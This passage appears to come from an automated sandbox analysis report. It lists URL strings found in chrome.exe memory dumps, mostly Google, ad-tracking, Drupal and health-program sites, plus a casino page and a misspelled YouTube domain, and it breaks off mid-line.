Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472305495.000028EC028B6000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json7
Source: chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385578188.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302407484.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468568226.000028EC0231C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://postrelease.com
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api/store#subscribelistener
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-4-store#creating-a-store-with-enhancers
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-4-store#middleware
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-6-async-logic#using-the-redux-thunk-middleware
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://samplicio.us
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478072951.000028EC03020000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://semafor.com
Source: chrome.exe, 00000000.00000002.2476347082.000028EC02DF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/a/37825072/145846
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
Source: chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://td.doubleclick.net
Source: chrome.exe, 00000000.00000002.2494712430.000028EC045CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344781235.000028EC07948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320493460.000028EC029A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thrive.fohwtc.ca/thrive/request-a-speaker#request-speaker
Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://topkasynaonline.com/vulkanbet-bonus-bez-depozytu/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://torneos.gg
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/FoHTHRIVE
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wellnessapp.ca/
Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wellnessapp.ca/app/login
Source: chrome.exe, 00000000.00000002.2484637468.000028EC0370C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org)
Source: chrome.exe, 00000000.00000002.2484637468.000028EC0370C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org)X-Drupal-Cache:
Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/core/deprecation#javascript
Source: chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/node/2940704
Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/node/3154948.
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/bootstrap/issues/3013236
Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/drupal/issues/2973400
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/webform/issues/2856795
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/webform/issues/3068998
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486476343.000028EC039A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474265467.000028EC02B50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2474190232.000028EC02B3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483787060.000028EC03640000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/ccm/collect
Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhab
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkeh
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pkomkdjpm
Source: chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473409026.000028EC02A34000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000000.00000003.2332533118.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332565269.000028EC04794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332607347.000028EC065E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js
Source: chrome.exe, 00000000.00000003.2332533118.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332565269.000028EC04794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332607347.000028EC065E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.jsaDb
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/pagead/1p-conversion
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/pagead/form-data
Source: chrome.exe, 00000000.00000002.2469101930.000028EC0239C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_ZT0XGPL
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/travel/flights/click/conversion
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleadservices.com
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleadservices.com/pagead/conversion
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/a?
Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-WF39Z4TEVT
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348751663.000028EC05D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394122442.000028EC08004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508573423.000028EC07FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394161248.000028EC07ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348751663.000028EC05D32000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393958891.000028EC07FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348998445.000028EC05D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348751663.000028EC05D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394204785.000028EC062E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499311995.000028EC062E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361413863.000028EC062E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.jsaDb
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343172211.000028EC06CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/eureka/clank/134/cast_sender.js
Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.jsdelivr.com/using-sri-with-dynamic-files
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mentalhealthns.ca/fountain-of-health
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.merchant-center-analytics.goog
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sitepoint.com/jquery-function-clear-form-data/
Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtbe.com/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2497831692.000028EC04E14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 